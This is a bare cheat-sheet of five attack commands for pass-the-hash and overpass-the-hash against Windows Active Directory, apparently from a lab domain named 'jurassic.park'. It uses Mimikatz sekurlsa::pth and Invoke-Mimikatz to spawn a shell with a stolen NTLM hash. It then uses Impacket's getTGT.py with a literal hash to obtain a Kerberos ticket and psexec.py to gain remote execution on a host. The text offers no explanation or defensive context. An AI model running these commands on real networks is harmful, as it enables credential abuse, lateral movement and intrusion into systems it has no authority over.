sekurlsa::pth /user:$User /domain:$domain.domain /ntlm:$hash /run:powershell.exe
Invoke-Mimikatz -Command '"sekurlsa::pth /user:$User /domain:$domain.domain /ntlm:$hash /run:powershell.exe"'
getTGT.py jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7
export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass